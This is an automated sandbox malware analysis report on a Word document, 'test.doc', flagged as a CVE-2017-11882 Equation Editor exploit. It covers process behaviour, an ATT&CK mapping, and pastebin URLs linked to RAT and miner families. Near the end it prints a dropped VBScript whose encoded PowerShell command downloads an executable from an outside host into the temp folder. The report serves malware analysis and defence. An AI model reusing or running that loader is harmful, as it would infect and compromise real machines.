Source: C:\Windows\System32\mmc.exe	Memory allocated: 3F50000 memory commit \| memory reserve \| memory write watch
Source: C:\Windows\System32\mmc.exe	Memory allocated: 6520000 memory commit \| memory reserve \| memory write watch
Source: C:\Windows\System32\mmc.exe	Memory allocated: 3DD0000 memory commit \| memory reserve \| memory write watch
Source: C:\Windows\System32\mmc.exe	Memory allocated: 2AF0000 memory commit \| memory reserve \| memory write watch
Source: C:\Windows\System32\mmc.exe	Memory allocated: 4060000 memory commit \| memory reserve \| memory write watch
Source: C:\Windows\System32\mmc.exe	Memory allocated: 4130000 memory commit \| memory reserve \| memory write watch
Source: C:\Windows\System32\mmc.exe	Memory allocated: 63F0000 memory commit \| memory reserve \| memory write watch
Source: C:\Windows\System32\mmc.exe	Memory allocated: 3C80000 memory commit \| memory reserve \| memory write watch
Source: C:\Windows\System32\mmc.exe	Memory allocated: 3BE0000 memory commit \| memory reserve \| memory write watch
Source: C:\Windows\System32\mmc.exe	Memory allocated: 41D0000 memory commit \| memory reserve \| memory write watch
Source: C:\Windows\System32\mmc.exe	Memory allocated: 43C0000 memory commit \| memory reserve \| memory write watch
Source: C:\Windows\System32\mmc.exe	Memory allocated: 6460000 memory commit \| memory reserve \| memory write watch
Source: C:\Windows\System32\mmc.exe	Memory allocated: 4000000 memory commit \| memory reserve \| memory write watch
Source: C:\Windows\System32\mmc.exe	Memory allocated: 2770000 memory commit \| memory reserve \| memory write watch
Source: C:\Windows\System32\mmc.exe	Memory allocated: 2840000 memory commit \| memory reserve \| memory write watch
Source: C:\Windows\System32\mmc.exe	Memory allocated: 2BA0000 memory commit \| memory reserve \| memory write watch
Source: C:\Windows\System32\mmc.exe	Memory allocated: 49D0000 memory commit \| memory reserve \| memory write watch
Source: C:\Windows\System32\mmc.exe	Memory allocated: 3EE0000 memory commit \| memory reserve \| memory write watch
Source: C:\Windows\System32\mmc.exe	Memory allocated: 2FC0000 memory commit \| memory reserve \| memory write watch
Source: C:\Windows\System32\mmc.exe	Memory allocated: 4000000 memory commit \| memory reserve \| memory write watch
Source: C:\Windows\System32\mmc.exe	Memory allocated: 4480000 memory commit \| memory reserve \| memory write watch
Source: C:\Windows\System32\mmc.exe	Memory allocated: 6440000 memory commit \| memory reserve \| memory write watch
Source: C:\Windows\System32\mmc.exe	Memory allocated: 3EF0000 memory commit \| memory reserve \| memory write watch
Source: C:\Windows\System32\mmc.exe	Memory allocated: 29D0000 memory commit \| memory reserve \| memory write watch
Source: C:\Windows\System32\mmc.exe	Memory allocated: 4260000 memory commit \| memory reserve \| memory write watch
Source: C:\Windows\System32\mmc.exe	Memory allocated: 42A0000 memory commit \| memory reserve \| memory write watch
Source: C:\Windows\System32\mmc.exe	Memory allocated: 62D0000 memory commit \| memory reserve \| memory write watch
Source: C:\Windows\System32\mmc.exe	Memory allocated: 4040000 memory commit \| memory reserve \| memory write watch
Source: C:\Windows\System32\mmc.exe	Memory allocated: 26F0000 memory commit \| memory reserve \| memory write watch
Source: C:\Windows\System32\mmc.exe	Memory allocated: 2870000 memory commit \| memory reserve \| memory write watch
Source: C:\Windows\System32\mmc.exe	Memory allocated: 2930000 memory commit \| memory reserve \| memory write watch
Source: C:\Windows\System32\mmc.exe	Memory allocated: 6680000 memory commit \| memory reserve \| memory write watch

Source: C:\Windows\System32\taskmgr.exe	Window / User API: foregroundWindowGot 401	Jump to behavior
Source: C:\Windows\System32\taskmgr.exe	Window / User API: foregroundWindowGot 473	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Window / User API: threadDelayed 924	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Window / User API: threadDelayed 2494	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Window / User API: threadDelayed 898	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Window / User API: threadDelayed 2625	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Window / User API: threadDelayed 861
Source: C:\Windows\System32\mmc.exe	Window / User API: threadDelayed 2702
Source: C:\Windows\System32\mmc.exe	Window / User API: threadDelayed 2728
Source: C:\Windows\System32\mmc.exe	Window / User API: threadDelayed 866
Source: C:\Windows\System32\mmc.exe	Window / User API: threadDelayed 2578
Source: C:\Windows\System32\mmc.exe	Window / User API: threadDelayed 867
Source: C:\Windows\System32\mmc.exe	Window / User API: threadDelayed 824
Source: C:\Windows\System32\mmc.exe	Window / User API: threadDelayed 2356
Source: C:\Windows\System32\mmc.exe	Window / User API: threadDelayed 773
Source: C:\Windows\System32\mmc.exe	Window / User API: threadDelayed 2322
Source: C:\Windows\System32\mmc.exe	Window / User API: threadDelayed 857
Source: C:\Windows\System32\mmc.exe	Window / User API: threadDelayed 2155
Source: C:\Windows\System32\mmc.exe	Window / User API: threadDelayed 765
Source: C:\Windows\System32\mmc.exe	Window / User API: threadDelayed 2128
Source: C:\Windows\System32\mmc.exe	Window / User API: threadDelayed 794
Source: C:\Windows\System32\mmc.exe	Window / User API: threadDelayed 1973
Source: C:\Windows\System32\mmc.exe	Window / User API: threadDelayed 740
Source: C:\Windows\System32\mmc.exe	Window / User API: threadDelayed 1989
Source: C:\Windows\System32\mmc.exe	Window / User API: threadDelayed 780
Source: C:\Windows\System32\mmc.exe	Window / User API: threadDelayed 1767
Source: C:\Windows\System32\mmc.exe	Window / User API: threadDelayed 737
Source: C:\Windows\System32\mmc.exe	Window / User API: threadDelayed 1509
Source: C:\Windows\System32\mmc.exe	Window / User API: threadDelayed 1711
Source: C:\Windows\System32\mmc.exe	Window / User API: threadDelayed 676
Source: C:\Windows\System32\mmc.exe	Window / User API: threadDelayed 1571
Source: C:\Windows\System32\mmc.exe	Window / User API: threadDelayed 662
Source: C:\Windows\System32\mmc.exe	Window / User API: threadDelayed 646
Source: C:\Windows\System32\mmc.exe	Window / User API: threadDelayed 1496

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3388	Thread sleep time: -300000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\mmc.exe TID: 4064	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\mmc.exe TID: 2964	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\mmc.exe TID: 660	Thread sleep count: 898 > 30	Jump to behavior
Source: C:\Windows\System32\mmc.exe TID: 660	Thread sleep count: 2625 > 30	Jump to behavior
Source: C:\Windows\System32\mmc.exe TID: 300	Thread sleep time: -180000s >= -30000s
Source: C:\Windows\System32\mmc.exe TID: 2864	Thread sleep time: -180000s >= -30000s
Source: C:\Windows\System32\mmc.exe TID: 3080	Thread sleep time: -180000s >= -30000s
Source: C:\Windows\System32\mmc.exe TID: 1780	Thread sleep time: -180000s >= -30000s
Source: C:\Windows\System32\mmc.exe TID: 520	Thread sleep time: -180000s >= -30000s
Source: C:\Windows\System32\mmc.exe TID: 3592	Thread sleep count: 773 > 30
Source: C:\Windows\System32\mmc.exe TID: 3592	Thread sleep count: 2322 > 30
Source: C:\Windows\System32\mmc.exe TID: 1864	Thread sleep time: -180000s >= -30000s
Source: C:\Windows\System32\mmc.exe TID: 2520	Thread sleep time: -120000s >= -30000s
Source: C:\Windows\System32\mmc.exe TID: 3596	Thread sleep count: 765 > 30
Source: C:\Windows\System32\mmc.exe TID: 3596	Thread sleep count: 2128 > 30
Source: C:\Windows\System32\mmc.exe TID: 628	Thread sleep time: -180000s >= -30000s
Source: C:\Windows\System32\mmc.exe TID: 2032	Thread sleep time: -120000s >= -30000s
Source: C:\Windows\System32\mmc.exe TID: 1876	Thread sleep time: -180000s >= -30000s
Source: C:\Windows\System32\mmc.exe TID: 3680	Thread sleep time: -120000s >= -30000s
Source: C:\Windows\System32\mmc.exe TID: 3832	Thread sleep time: -180000s >= -30000s
Source: C:\Windows\System32\mmc.exe TID: 3792	Thread sleep count: 1711 > 30
Source: C:\Windows\System32\mmc.exe TID: 3792	Thread sleep count: 676 > 30
Source: C:\Windows\System32\mmc.exe TID: 1560	Thread sleep time: -180000s >= -30000s
Source: C:\Windows\System32\mmc.exe TID: 2772	Thread sleep time: -120000s >= -30000s

Source: C:\Windows\System32\taskmgr.exe	Process created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"	Jump to behavior
Source: C:\Windows\System32\taskmgr.exe	Process created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"	Jump to behavior
Source: C:\Windows\System32\taskmgr.exe	Process created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"	Jump to behavior
Source: C:\Windows\System32\taskmgr.exe	Process created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"	Jump to behavior
Source: C:\Windows\System32\taskmgr.exe	Process created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"	Jump to behavior
Source: C:\Windows\System32\taskmgr.exe	Process created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"	Jump to behavior
Source: C:\Windows\System32\taskmgr.exe	Process created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"	Jump to behavior
Source: C:\Windows\System32\taskmgr.exe	Process created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"	Jump to behavior
Source: C:\Windows\System32\taskmgr.exe	Process created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"	Jump to behavior
Source: C:\Windows\System32\taskmgr.exe	Process created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"	Jump to behavior
Source: C:\Windows\System32\taskmgr.exe	Process created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"	Jump to behavior
Source: C:\Windows\System32\taskmgr.exe	Process created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"	Jump to behavior
Source: C:\Windows\System32\taskmgr.exe	Process created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"	Jump to behavior
Source: C:\Windows\System32\taskmgr.exe	Process created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"	Jump to behavior
Source: C:\Windows\System32\taskmgr.exe	Process created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"	Jump to behavior
Source: C:\Windows\System32\taskmgr.exe	Process created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"	Jump to behavior
Source: C:\Windows\System32\taskmgr.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\taskmgr.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\taskmgr.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\taskmgr.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\taskmgr.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\taskmgr.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Windows\System32\mmc.exe	Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Windows\System32\mmc.exe	Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Windows\System32\mmc.exe	Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Windows\System32\mmc.exe	Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Windows\System32\mmc.exe	Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Windows\System32\mmc.exe	Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Windows\System32\mmc.exe	Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Windows\System32\mmc.exe	Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Windows\System32\mmc.exe	Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Windows\System32\mmc.exe	Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Windows\System32\mmc.exe	Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Windows\System32\mmc.exe	Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Windows\System32\mmc.exe	Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	23 Exploitation for Client Execution	1 DLL Side-Loading	11 Process Injection	1 Masquerading	OS Credential Dumping	2 Virtualization/Sandbox Evasion	Remote Services	1 Email Collection	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Modify Registry	LSASS Memory	1 Application Window Discovery	Remote Desktop Protocol	1 Clipboard Data	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	2 Virtualization/Sandbox Evasion	Security Account Manager	1 Remote System Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Process Injection	NTDS	1 File and Directory Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	13 System Information Discovery	SSH	Keylogging	13 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Install Root Certificate	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
test.doc	64%	ReversingLabs	Document-Office.Exploit.CVE-2017-11882
test.doc	57%	Virustotal		Browse
test.doc	100%	Avira	HEUR/Rtf.Malformed

Source	Detection	Scanner	Label	Link
pastebin.com	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://crl.entrust.net/server1.crl0	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
https://secure.comodo.com/CPS0	0%	URL Reputation	safe
http://crl.entrust.net/2048ca.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	Virustotal		Browse
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	Virustotal		Browse
https://pastebin.com/	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
pastebin.com	104.20.4.235	true	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://pastebin.com/raw/JtdAmHD5	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	EQNEDT32.EXE, 00000002.00000002.1530889300.00000000009C1000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://pastebin.com/raw/JtdAmHD5Py	EQNEDT32.EXE, 00000002.00000002.1530889300.0000000000914000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://crl.entrust.net/server1.crl0	EQNEDT32.EXE, 00000002.00000002.1530889300.00000000009C1000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://pastebin.com/raw/JtdAmHD5598B1687	EQNEDT32.EXE, 00000002.00000002.1530889300.0000000000914000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://ocsp.entrust.net03	EQNEDT32.EXE, 00000002.00000002.1530889300.00000000009C1000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://pastebin.com/raw/JtdAmHD556z	EQNEDT32.EXE, 00000002.00000002.1530889300.0000000000914000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://pastebin.com/raw/JtdAmHD5ed	EQNEDT32.EXE, 00000002.00000002.1530889300.00000000008F0000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://pastebin.com/raw/JtdAmHD5:	EQNEDT32.EXE, 00000002.00000002.1530889300.00000000009C1000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://pastebin.com/raw/JtdAmHD5...mpoq	EQNEDT32.EXE, 00000002.00000002.1530889300.00000000009C1000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://pastebin.com/raw/JtdAmHD5dy	EQNEDT32.EXE, 00000002.00000002.1530889300.0000000000914000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	EQNEDT32.EXE, 00000002.00000002.1530889300.00000000009C1000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
http://www.diginotar.nl/cps/pkioverheid0	EQNEDT32.EXE, 00000002.00000002.1530889300.00000000009C1000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://pastebin.com/raw/JtdAmHD5...	EQNEDT32.EXE, 00000002.00000002.1530889300.00000000009C1000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://pastebin.com/	EQNEDT32.EXE, 00000002.00000002.1530889300.000000000097D000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
http://ocsp.entrust.net0D	EQNEDT32.EXE, 00000002.00000002.1530889300.00000000009C1000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://secure.comodo.com/CPS0	EQNEDT32.EXE, 00000002.00000002.1530889300.00000000009C1000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.entrust.net/2048ca.crl0	EQNEDT32.EXE, 00000002.00000002.1530889300.00000000009C1000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.20.4.235	pastebin.com	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1532551
Start date and time:	2024-10-13 17:14:09 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 16m 19s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	40
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	test.doc
Detection:	MAL
Classification:	mal92.troj.expl.winDOC@103/6@1/1
EGA Information:	Failed
HCA Information:	Successful, ratio: 97% Number of executed functions: 67 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .doc

Warnings

Max analysis timeout: 600s exceeded, the analysis took too long
Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, svchost.exe
Execution Graph export aborted for target EQNEDT32.EXE, PID 3368 because there are no executed function
Execution Graph export aborted for target mmc.exe, PID 1860 because it is empty
Execution Graph export aborted for target mmc.exe, PID 1996 because it is empty
Execution Graph export aborted for target mmc.exe, PID 2124 because it is empty
Execution Graph export aborted for target mmc.exe, PID 2316 because it is empty
Execution Graph export aborted for target mmc.exe, PID 2664 because it is empty
Execution Graph export aborted for target mmc.exe, PID 2996 because it is empty
Execution Graph export aborted for target mmc.exe, PID 3068 because it is empty
Execution Graph export aborted for target mmc.exe, PID 3448 because it is empty
Execution Graph export aborted for target mmc.exe, PID 3464 because it is empty
Execution Graph export aborted for target mmc.exe, PID 3508 because it is empty
Execution Graph export aborted for target mmc.exe, PID 3576 because it is empty
Execution Graph export aborted for target mmc.exe, PID 3588 because it is empty
Execution Graph export aborted for target mmc.exe, PID 3784 because it is empty
Execution Graph export aborted for target mmc.exe, PID 3872 because it is empty
Execution Graph export aborted for target mmc.exe, PID 4028 because it is empty
Execution Graph export aborted for target mmc.exe, PID 4060 because it is empty
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtEnumerateValueKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
11:15:04	API Interceptor	2336x Sleep call for process: EQNEDT32.EXE modified
11:16:04	API Interceptor	6170x Sleep call for process: taskmgr.exe modified
11:16:12	API Interceptor	8559x Sleep call for process: mmc.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.20.4.235	sostener.vbs	Get hash	malicious	Njrat	Browse	pastebin.com/raw/V9y5Q5vv
	sostener.vbs	Get hash	malicious	XWorm	Browse	pastebin.com/raw/V9y5Q5vv
	envifa.vbs	Get hash	malicious	Remcos	Browse	pastebin.com/raw/V9y5Q5vv
	New Voicemail Invoice 64746w .js	Get hash	malicious	WSHRAT	Browse	pastebin.com/raw/NsQ5qTHr
	Invoice Payment N8977823.js	Get hash	malicious	WSHRAT	Browse	pastebin.com/raw/NsQ5qTHr
	Pending_Invoice_Bank_Details_XLSX.js	Get hash	malicious	WSHRAT	Browse	pastebin.com/raw/NsQ5qTHr
	Pending_Invoice_Bank_Details_kofce_.JS.js	Get hash	malicious	WSHRAT	Browse	pastebin.com/raw/NsQ5qTHr
	Update on Payment.js	Get hash	malicious	WSHRAT	Browse	pastebin.com/raw/NsQ5qTHr

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
pastebin.com	invoice.exe	Get hash	malicious	MinerDownloader, RedLine, Xmrig	Browse	104.20.3.235
	awb_shipping_doc_001700720242247820020031808174CN18003170072024_00000000pdf.js	Get hash	malicious	Remcos	Browse	172.67.19.24
	egFMhHSlmf.exe	Get hash	malicious	Xmrig	Browse	172.67.19.24
	Quotation request YN2024-10-07pdf.vbs	Get hash	malicious	Remcos	Browse	104.20.4.235
	eshkere.bat	Get hash	malicious	Xmrig	Browse	104.20.4.235
	frik.exe	Get hash	malicious	Xmrig	Browse	104.20.3.235
	Google Chrome.exe	Get hash	malicious	Xmrig	Browse	172.67.19.24
	SecuriteInfo.com.Win64.MalwareX-gen.31726.9623.exe	Get hash	malicious	Unknown	Browse	104.20.4.235
	SecuriteInfo.com.Win64.MalwareX-gen.19388.23445.exe	Get hash	malicious	Unknown	Browse	172.67.19.24
	SecuriteInfo.com.Win64.MalwareX-gen.19388.23445.exe	Get hash	malicious	Unknown	Browse	172.67.19.24

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8
	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	Setup.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	Setup.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8
	Set-up.exe	Get hash	malicious	LummaC	Browse	104.21.77.78
	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	SecuriteInfo.com.FileRepMalware.27261.32754.exe	Get hash	malicious	Unknown	Browse	104.18.11.89
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
7dcce5b76c8b17472d024758970a406b	PO-00006799868.xls	Get hash	malicious	Remcos	Browse	104.20.4.235
	STATEMENT - PAYMENT TRACKING Sept 2024.docx.doc	Get hash	malicious	Remcos	Browse	104.20.4.235
	QKnj2Wb3yo.xlsx	Get hash	malicious	Hidden Macro 4.0	Browse	104.20.4.235
	KjFT0qPTo4.vbs	Get hash	malicious	FormBook	Browse	104.20.4.235
	Quotation_398893.xlam.xlsx	Get hash	malicious	Unknown	Browse	104.20.4.235
	Documentosrs.ppam	Get hash	malicious	RevengeRAT	Browse	104.20.4.235
	PO-95958694495545.xls	Get hash	malicious	Remcos	Browse	104.20.4.235
	COT139562833.ATMetorlogya.xls	Get hash	malicious	Unknown	Browse	104.20.4.235
	Ordin de plat#U0103.docx.doc	Get hash	malicious	Unknown	Browse	104.20.4.235
	COT139562833.ATMetorlogya.xls	Get hash	malicious	Unknown	Browse	104.20.4.235

Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	HTML document, ASCII text, with very long lines (324), with CRLF line terminators
Category:	dropped
Size (bytes):	1500
Entropy (8bit):	5.412385328672839
Encrypted:	false
SSDEEP:	24:8gSLK2x4bYq3tEElVfua3LlK90VA9FndAKdxn31AnRvIBSaFd07DWyACaZTFKe5X:USZlMndNFSazkqScTnsoiHiKNnMK2
MD5:	565EF83DAFF3937B5039C67C82AE15CB
SHA1:	2E80B8D494C6A863C42598CF8283F71FD5CFCE36
SHA-256:	19F9A121FB829A19B5A515ABC1AEBE7BE340592E4D3B6851DB8D97218255879A
SHA-512:	3C8FE6102BBD9E96A9B31DD2545E5A40A4DFD2DA2B7269C3C283BAE1070EAE4C0B0228A26F7504E059A1E2FB683FFAFFD812BC17D8E36B20CF2B5F13FA54B1E7
Malicious:	false
Preview:	<script language="VBScript">.. Function var_Beinjaman().. Dim Dunjalar1212....Dim Dunjalar12121....Dim Dunjalar12122....Dim Dunjalar12123....Dim Dunjalar12124.. Set Dunjalar1212 = CreateObject("Wscript.Shell")....Dim Dunjalar12125....Dim Dunjalar12126....Dim Dunjalar12127....Dim Dunjalar12128....temp = Dunjalar1212.expandEnvironmentStrings("%temp%")....Dim Dunjalar12129....Dim Dunjalar121210....Dim Dunjalar121211....Dim Dunjalar121212....Dim Dunjalar121213....Dim Dunjalar121214.. Dunjalar1212.run "powershell -nop -w 1 -e aQBlAHgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABmAGkAbABlACgAIgBoAHQAdABwAHMAOgAvAC8AdgBvAGwAMgAuAHAAdwAvAG4AaQB0AGEAbAAuAGUAeABlACIALAAiACQAZQBuAHYAOgB0AGUAbQBwAFwAYgBhAGsAZAByAGEAdwAuAGUAeABlACIAKQApADsA", 0, true....Dim Dunjalar121215....Dim Dunjalar121216....Dim Dunjalar121217....Dim Dunjalar121218...End Function...Sub window_onload...const impersonation = 3...Const HIDDEN_WINDOW = 1

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\views[1]

Download File

Process:	C:\Windows\System32\mmc.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1835
Entropy (8bit):	4.8246355222783786
Encrypted:	false
SSDEEP:	48:1QuIGYwCQ73ZOaFibdMpn1c2CqWMwr8Qp5lAh:SncJO8ZDru9S
MD5:	BEE1758A485085BB8A121EB74BA7E96F
SHA1:	8024492E1126B17F832E36C932D433200180B693
SHA-256:	EDCAD5B1CE8A304B70B8C9EA57D4AEAB740D979FFA59243B943011CB1BA4D57E
